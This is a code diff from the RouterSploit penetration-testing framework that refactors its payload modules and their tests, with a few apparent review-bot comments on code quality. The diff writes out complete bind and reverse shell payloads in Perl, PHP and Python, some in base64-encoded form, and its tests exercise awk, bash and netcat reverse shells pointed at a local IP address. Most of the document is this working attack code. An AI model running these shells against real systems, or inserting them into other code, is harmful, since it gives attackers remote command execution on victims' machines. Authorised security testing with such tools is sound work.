...@@ -11,14 +16,14 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -11,14 +16,14 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PERL
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"use IO;foreach my $key(keys %ENV){" + "use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," + "if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," +
str(self.rport) + str(self.rport) +
",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" + ",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" +
"if($_=~ /(.*)/){system $1;}};" "if($_=~ /(.*)/){system $1;}};"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
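Review bot: `encoder = OptString(Encoder(), "Encoder")` instantiates the encoder at class-definition (import) time and stores an object in an option whose type name promises a string; the Perl reverse and PHP bind payloads do the same, and each hard-imports one encoder module by path even though `BasePayload.get_encoder` already resolves `"perl/base64"`-style names. If `OptString.__set__` stringifies its value (not visible here), the stored encoder would be reduced to its `module_name` and `self.encoder.encode` in `GenericPayload.run` would fail, so this needs checking; a string default such as `encoder = OptString("perl/base64", "Encoder")` resolved through `get_encoder` in `__init__` keeps the option a plain string and drops the module coupling. A comment on the attribute, e.g. `# default encoder; overridable with `set encoder <arch>/<name>``, would also help.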
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.perl.base64 import Encoder
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Perl Reverse TCP", "name": "Perl Reverse TCP",
"description": "Creates interactive tcp reverse shell by using perl.", "description": "Creates interactive tcp reverse shell by using perl.",
...@@ -11,8 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -11,8 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PERL
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"use IO;foreach my $key(keys %ENV){" + "use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" + "if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" +
self.lhost + self.lhost +
...@@ -20,6 +28,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -20,6 +28,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
str(self.lport) + str(self.lport) +
"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};" "\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
BindTCPPayloadMixin,
)
from routersploit.modules.encoders.php.base64 import Encoder
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "PHP Bind TCP", "name": "PHP Bind TCP",
"description": "Creates interactive tcp bind shell by using php.", "description": "Creates interactive tcp bind shell by using php.",
...@@ -12,8 +17,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -12,8 +17,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PHP
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" + "$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
"socket_bind($s,\"0.0.0.0\",{});".format(self.rport) + "socket_bind($s,\"0.0.0.0\",{});".format(self.rport) +
"socket_listen($s,1);" + "socket_listen($s,1);" +
...@@ -27,6 +35,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -27,6 +35,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"socket_write($cl,$m,strlen($m));" + "socket_write($cl,$m,strlen($m));" +
"}}" "}}"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "eval(base64_decode('{}'));".format(encoded_payload)
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.php.base64 import Encoder
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "PHP Reverse TCP", "name": "PHP Reverse TCP",
"description": "Creates interactive tcp reverse shell by using php.", "description": "Creates interactive tcp reverse shell by using php.",
...@@ -11,11 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -11,11 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PHP
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"$s=fsockopen(\"tcp://{}\",{});".format(self.lhost, self.lport) + "$s=fsockopen(\"tcp://{}\",{});".format(self.lhost, self.lport) +
"while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}" "while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "eval(base64_decode('{}'));".format(encoded_payload)
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
BindTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Python Bind TCP", "name": "Python Bind TCP",
"description": "Creates interactive tcp bind shell by using python.", "description": "Creates interactive tcp bind shell by using python.",
...@@ -11,8 +16,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -11,8 +16,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"import socket,os\n" + "import socket,os\n" +
"so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"so.bind(('0.0.0.0',{}))\n".format(self.rport) + "so.bind(('0.0.0.0',{}))\n".format(self.rport) +
...@@ -25,6 +33,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -25,6 +33,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"\tstdout_value=stdout.read()+stderr.read()\n" + "\tstdout_value=stdout.read()+stderr.read()\n" +
"\tso.send(stdout_value)\n" "\tso.send(stdout_value)\n"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
BindTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Python Bind UDP", "name": "Python Bind UDP",
"description": "Creates interactive udp bind shell by using python.", "description": "Creates interactive udp bind shell by using python.",
...@@ -12,8 +17,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -12,8 +17,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"from subprocess import Popen,PIPE\n" + "from subprocess import Popen,PIPE\n" +
"from socket import socket, AF_INET, SOCK_DGRAM\n" + "from socket import socket, AF_INET, SOCK_DGRAM\n" +
"s=socket(AF_INET,SOCK_DGRAM)\n" + "s=socket(AF_INET,SOCK_DGRAM)\n" +
...@@ -23,6 +31,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -23,6 +31,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" + "\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" +
"\ts.sendto(''.join([out[0],out[1]]),addr)\n" "\ts.sendto(''.join([out[0],out[1]]),addr)\n"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Python Reverse TCP", "name": "Python Reverse TCP",
"description": "Creates interactive tcp reverse shell by using python.", "description": "Creates interactive tcp reverse shell by using python.",
...@@ -11,8 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -11,8 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"import socket,subprocess,os\n" + "import socket,subprocess,os\n" +
"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"s.connect(('{}',{}))\n".format(self.lhost, self.lport) + "s.connect(('{}',{}))\n".format(self.lhost, self.lport) +
...@@ -21,6 +29,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -21,6 +29,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"os.dup2(s.fileno(),2)\n" + "os.dup2(s.fileno(),2)\n" +
"p=subprocess.call([\"/bin/sh\",\"-i\"])" "p=subprocess.call([\"/bin/sh\",\"-i\"])"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Python Reverse UDP", "name": "Python Reverse UDP",
"description": "Creates interactive udp reverse shell by using python.", "description": "Creates interactive udp reverse shell by using python.",
...@@ -12,8 +17,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -12,8 +17,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"import os\n" + "import os\n" +
"import pty\n" + "import pty\n" +
"import socket\n" + "import socket\n" +
...@@ -25,6 +33,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -25,6 +33,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"pty.spawn('/bin/sh');\n" + "pty.spawn('/bin/sh');\n" +
"s.close()\n" "s.close()\n"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "X64 Bind TCP", "name": "X64 Bind TCP",
"description": "Creates interactive tcp bind shell for X64 architecture.", "description": "Creates interactive tcp bind shell for X64 architecture.",
......
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "X64 Reverse TCP", "name": "X64 Reverse TCP",
"description": "Creates interactive tcp reverse shell for X64 architecture.", "description": "Creates interactive tcp reverse shell for X64 architecture.",
......
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "X86 Bind TCP", "name": "X86 Bind TCP",
"description": "Creates interactive tcp bind shell for X86 architecture.", "description": "Creates interactive tcp bind shell for X86 architecture.",
......
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "X86 Reverse TCP", "name": "X86 Reverse TCP",
"description": "Creates interactive tcp reverse shell for X86 architecture.", "description": "Creates interactive tcp reverse shell for X86 architecture.",
......
from routersploit.modules.encoders.perl.base64 import Encoder
# perl bind tcp payload with rport=4321
bind_tcp = (
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," +
"4321" +
",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" +
"if($_=~ /(.*)/){system $1;}};"
)
# perl bind tcp payload with rport=4321 encoded with perl/base64
bind_tcp_encoded = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));"
)
def test_payload_encoding():
""" Test scenario - payload encoding """
encoder = Encoder()
assert encoder.encode(bind_tcp) == bind_tcp_encoded
from routersploit.modules.encoders.php.base64 import Encoder
# php bind tcp payload with rport 4321
bind_tcp = (
"$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
"socket_bind($s,\"0.0.0.0\",4321);" +
"socket_listen($s,1);" +
"$cl=socket_accept($s);" +
"while(1){" +
"if(!socket_write($cl,\"$ \",2))exit;" +
"$in=socket_read($cl,100);" +
"$cmd=popen(\"$in\",\"r\");" +
"while(!feof($cmd)){" +
"$m=fgetc($cmd);" +
"socket_write($cl,$m,strlen($m));" +
"}}"
)
# php bind tcp payload with rport=4321 encoded with php/base64
bind_tcp_encoded = (
"eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));"
)
def test_payload_encoding():
""" Test scenario - payload encoding """
encoder = Encoder()
assert encoder.encode(bind_tcp) == bind_tcp_encoded
from routersploit.modules.encoders.php.hex import Encoder
# php bind tcp payload with rport 4321
bind_tcp = (
"$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
"socket_bind($s,\"0.0.0.0\",4321);" +
"socket_listen($s,1);" +
"$cl=socket_accept($s);" +
"while(1){" +
"if(!socket_write($cl,\"$ \",2))exit;" +
"$in=socket_read($cl,100);" +
"$cmd=popen(\"$in\",\"r\");" +
"while(!feof($cmd)){" +
"$m=fgetc($cmd);" +
"socket_write($cl,$m,strlen($m));" +
"}}"
)
# php bind tcp payload with rport=4321 encoded with php/hex
bind_tcp_encoded = (
"eval(hex2bin('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'));"
)
def test_payload_encoding():
""" Test scenario - payload encoding """
encoder = Encoder()
assert encoder.encode(bind_tcp) == bind_tcp_encoded
from routersploit.modules.encoders.python.base64 import Encoder
# python bind tcp payload with rport=4321
bind_tcp = (
"import socket,os\n" +
"so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"so.bind(('0.0.0.0',4321))\n" +
"so.listen(1)\n" +
"so,addr=so.accept()\n" +
"x=False\n" +
"while not x:\n" +
"\tdata=so.recv(1024)\n" +
"\tstdin,stdout,stderr,=os.popen3(data)\n" +
"\tstdout_value=stdout.read()+stderr.read()\n" +
"\tso.send(stdout_value)\n"
)
# python bind tcp payload with rport=4321 encoded with python/base64
bind_tcp_encoded = (
"exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))"
)
def test_payload_enconding():
""" Test scenario - payload encoding """
encoder = Encoder()
assert encoder.encode(bind_tcp) == bind_tcp_encoded
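Review bot: The test name on the `def` line is misspelled — `test_payload_enconding` — while the sibling encoder tests in this commit use `test_payload_encoding`; rename it to `def test_payload_encoding():`. The expected value also pins the `exec('…'.decode('base64'))` wrapper, which relies on the Python 2-only `str.decode` codec API; a one-line comment above `bind_tcp_encoded` recording that assumption would stop a later maintainer from reading a Python 3 failure as a regression in the encoder.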
from routersploit.modules.payloads.armle.bind_tcp import Exploit from routersploit.modules.payloads.armle.bind_tcp import Payload
# armle bind tcp payload with rport=4321 # armle bind tcp payload with rport=4321
...@@ -54,7 +54,7 @@ elf_armle_bind_tcp = ( ...@@ -54,7 +54,7 @@ elf_armle_bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
......
from routersploit.modules.payloads.armle.reverse_tcp import Exploit from routersploit.modules.payloads.armle.reverse_tcp import Payload
# armle reverse tcp with lhost=192.168.1.4 lport=4321 # armle reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -29,7 +29,7 @@ elf_armle_reverse_tcp = ( ...@@ -29,7 +29,7 @@ elf_armle_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
......
from routersploit.modules.payloads.cmd.awk_bind_tcp import Exploit from routersploit.modules.payloads.cmd.awk_bind_tcp import Payload
# awk bind tcp payload with rport=4321 # awk bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
from routersploit.modules.payloads.cmd.awk_bind_udp import Exploit from routersploit.modules.payloads.cmd.awk_bind_udp import Payload
# awk bind udp payload with rport=4321 # awk bind udp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_udp = ( ...@@ -10,7 +10,7 @@ bind_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_udp assert payload.run() == bind_udp
from routersploit.modules.payloads.cmd.awk_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.awk_reverse_tcp import Payload
# awk reverse tcp payload with lhost=192.168.1.4 lport=4321 # awk reverse tcp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
from routersploit.modules.payloads.cmd.bash_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.bash_reverse_tcp import Payload
# bash reverse tcp payload with lhost=192.168.1.4 lport=4321 # bash reverse tcp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
from routersploit.modules.payloads.cmd.netcat_bind_tcp import Exploit from routersploit.modules.payloads.cmd.netcat_bind_tcp import Payload
# netcat bind tcp payload with rport=4321 # netcat bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
from routersploit.modules.payloads.cmd.netcat_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.netcat_reverse_tcp import Payload
# netcat reverse tcp payload with lhost=192.168.1.4 lport=4321 # netcat reverse tcp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
from routersploit.modules.payloads.cmd.perl_bind_tcp import Exploit from routersploit.modules.payloads.cmd.perl_bind_tcp import Payload
# perl bind tcp payload with rport=4321 # perl bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
from routersploit.modules.payloads.cmd.perl_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.perl_reverse_tcp import Payload
# perl reverse udp payload with lhost=192.168.1.4 lport=4321 # perl reverse udp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
from routersploit.modules.payloads.cmd.php_bind_tcp import Exploit from routersploit.modules.payloads.cmd.php_bind_tcp import Payload
# php bind tcp payload with rport=4321 # php bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
from routersploit.modules.payloads.cmd.php_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.php_reverse_tcp import Payload
# php reverse udp payload with lhost=192.168.1.4 lport=4321 # php reverse udp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
from routersploit.modules.payloads.cmd.python_bind_tcp import Exploit from routersploit.modules.payloads.cmd.python_bind_tcp import Payload
# python bind tcp payload with rport=4321 # python bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
from routersploit.modules.payloads.cmd.python_bind_udp import Exploit from routersploit.modules.payloads.cmd.python_bind_udp import Payload
# python bind udp payload with rport=4321 # python bind udp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_udp = ( ...@@ -10,7 +10,7 @@ bind_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_udp assert payload.run() == bind_udp
from routersploit.modules.payloads.cmd.python_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.python_reverse_tcp import Payload
# python reverse tcp payload with lhost=192.168.1.4 lport=4321 # python reverse tcp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
from routersploit.modules.payloads.cmd.python_reverse_udp import Exploit from routersploit.modules.payloads.cmd.python_reverse_udp import Payload
# python reverse udp payload with lhost=192.168.1.4 lport=4321 # python reverse udp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_udp = ( ...@@ -10,8 +10,8 @@ reverse_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_udp assert payload.run() == reverse_udp
from routersploit.modules.payloads.mipsbe.bind_tcp import Exploit from routersploit.modules.payloads.mipsbe.bind_tcp import Payload
# mipsbe bind tcp payload with rport=4321 # mipsbe bind tcp payload with rport=4321
...@@ -51,7 +51,7 @@ elf_mipsbe_bind_tcp = ( ...@@ -51,7 +51,7 @@ elf_mipsbe_bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
